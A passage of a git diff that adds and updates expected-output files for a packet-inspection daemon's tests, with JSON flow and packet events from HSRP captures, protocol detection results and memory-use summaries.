+00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wMgQAADAgARcAAMAAAAAABESPiChyq\/eAAAAIHwQfBABw50wAAEAMKWgwAY2lzY28AAAAKHKr+"}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wNgQAADQgARcAAMAAAAAABESLiChyr\/eAAAAIHwQfBABw20wAAEAMKWg0AY2lzY28AAAAKHKv+"}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1126551971931,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1126551971931,"pkt":"AQBeAAACABJ\/uh8CgQAACggARcAAMAAAAAABESXjChyo\/OAAAAIHwQfBABxH3gAACAMKUAoAY2lzY28AAAAKHKj+"}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","total-events-serialized":18}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 4/4
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 80 bytes
+~~ total detected protocols..: 4
+~~ total active/idle flows...: 4/4
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4682514 bytes
+~~ total memory freed........: 4682514 bytes
+~~ total allocations/frees...: 101156/101156
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 158 chars
+~~ json string max len.......: 669 chars
+~~ json string avg len.......: 483 chars
diff --git a/test/results/hsrp2.pcap.out b/test/results/hsrp2.pcap.out
new file mode 100644
index 000000000..22286a5b1
--- /dev/null
+++ b/test/results/hsrp2.pcap.out
@@ -0,0 +1,25 @@
+00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hsrp2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643795481192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1643795481192,"pkt":"AQBeAABmcA9q7\/W\/CABFwABQAAAAAP8R88QKNNx94AAAZgfBB8EAPOmuASgCAAUEA5hwD2rv9b8AAABaAAALuAAAJxAKNNx+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643795481220,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1643795481220,"pkt":"AQBeAABmAAAMn\/BnCABFwABQAAAAAP8R0sQKNP194AAAZgfBB8EAPKnLASgCAAYEAGdwD2rv9b8AAABuAAALuAAAJxAKNP1+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","total-events-serialized":10}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 2/2
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 104 bytes
+~~ total detected protocols..: 2
+~~ total active/idle flows...: 2/2
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4680712 bytes
+~~ total memory freed........: 4680712 bytes
+~~ total allocations/frees...: 101148/101148
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 158 chars
+~~ json string max len.......: 671 chars
+~~ json string avg len.......: 481 chars
diff --git a/test/results/hsrp2_ipv6.pcapng.out b/test/results/hsrp2_ipv6.pcapng.out
new file mode 100644
index 000000000..b131b2fcf
--- /dev/null
+++ b/test/results/hsrp2_ipv6.pcapng.out
@@ -0,0 +1,31 @@
+00444{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1589369101819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"ts_msec":1589369101819,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1589369104269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"ts_msec":1589369104269,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1589369122912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"ts_msec":1589369122912,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0AUK+YASgCAAQGABCqu8wAASAAAABpAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAQAAAABR0exRqzRQmrLjMYjKT+47"}
+00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1589369125824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"ts_msec":1589369125824,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0AUAFOASgCAAQGABCqu8wAAiAAAABkAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAgAAAAA6x1WuKROwiNJvQ30Zxepz"}
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1589369130453,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"ts_msec":1589369130453,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"}
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1589369131526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"ts_msec":1589369131526,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"}
+00808{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":24,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1589369101819,"flow_last_seen":1589369183221,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":666,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1589369193008,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00808{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":28,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1589369104269,"flow_last_seen":1589369200769,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1589369210010,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369104269,"flow_last_seen":1589369235852,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369101819,"flow_last_seen":1589369240383,"flow_idle_time":180000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
+00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","total-events-serialized":16}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 36/36
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 1998 bytes
+~~ total detected protocols..: 2
+~~ total active/idle flows...: 2/2
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4681698 bytes
+~~ total memory freed........: 4681698 bytes
+~~ total allocations/frees...: 101182/101182
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 166 chars
+~~ json string max len.......: 813 chars
+~~ json string avg len.......: 559 chars
diff --git a/test/results/http-crash-content-disposition.pcap.out b/test/results/http-crash-content-disposition.pcap.out
index c20cefb76..6abe562ca 100644
--- a/test/results/http-crash-content-disposition.pcap.out
+++ b/test/results/http-crash-content-disposition.pcap.out
@@ -26,9 +26,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 183 chars
 ~~ json string max len.......: 2295 chars
diff --git a/test/results/http-lines-split.pcap.out b/test/results/http-lines-split.pcap.out
index 25433a0fa..bc95f8f71 100644
--- a/test/results/http-lines-split.pcap.out
+++ b/test/results/http-lines-split.pcap.out
@@ -3,8 +3,8 @@
